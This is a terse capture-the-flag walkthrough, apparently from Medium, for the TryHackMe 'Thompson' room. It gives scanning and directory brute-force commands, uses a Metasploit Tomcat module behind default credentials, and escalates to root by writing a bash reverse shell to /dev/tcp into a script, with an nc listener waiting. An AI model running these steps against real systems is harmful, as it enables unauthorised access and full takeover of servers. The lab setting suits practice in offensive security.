Thompson — TryHackMe — WriteUp

nmap -A -T4 -p- -v <ip>

nmap
Website

gobuster dir -u http://<ip>:8080 -w /path-to-wordlist

gobuster
default credential
/manager
/host-manager

msfdb init && msfconsole

search tomcat

search msf

use 17

options
shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

tty shell
test.txt

cat > id.sh <<EOF

#!/bin/bash

bash -i >& /dev/tcp/<your-vpn-ip>/<port> 0>&1

EOF

id.sh

nc -lvnp <port>

root
root.txt

HAPPY HACKING

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store